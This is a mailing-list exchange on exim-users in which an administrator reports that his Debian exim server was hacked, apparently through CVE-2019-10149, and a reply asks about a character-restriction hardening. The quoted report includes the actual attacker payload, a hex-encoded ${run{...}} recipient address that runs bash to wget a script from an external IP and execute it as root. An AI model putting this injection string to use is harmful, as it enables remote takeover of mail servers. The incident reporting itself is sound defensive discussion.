You got it. Why didn't you harden your exim with the "allowed chars" change we posted here on the list, or did you?
Am 11. Juni 2019 02:10:40 MESZ schrieb Calum Mackay via Exim-users <[email protected]>: >hi all, > >My mail system has just been hacked; it's running Debian unstable exim >4.91-9 > >Could it be CVE-2019-10149? I don't see any reports of active exploits >yet. > >The reasons I suspect exim involvement: > >• starting today, every 5 mins getting frozen messages: > >The following address(es) have yet to be delivered: > >root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx: > >Too many "Received" headers - suspected mail loop > >• the trojan horse scripts, that were successfully installed on my >system, with root access, are all group Debian-exim > > >Luckily, it looks like the trojans did nothing more than repeated >attempts to open up my ssh server to root logins, which I think (and >hope) didn't actually work, so I may have been lucky, and the damage >isn't widespread. > > >ought I to be reporting this anywhere? > > >thanks, >calum. > >-- >## List details at https://lists.exim.org/mailman/listinfo/exim-users >## Exim details at http://www.exim.org/ >## Please use the Wiki with this list - http://wiki.exim.org/ -- Diese Nachricht wurde von meinem Android-Gerät mit K-9 Mail gesendet. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
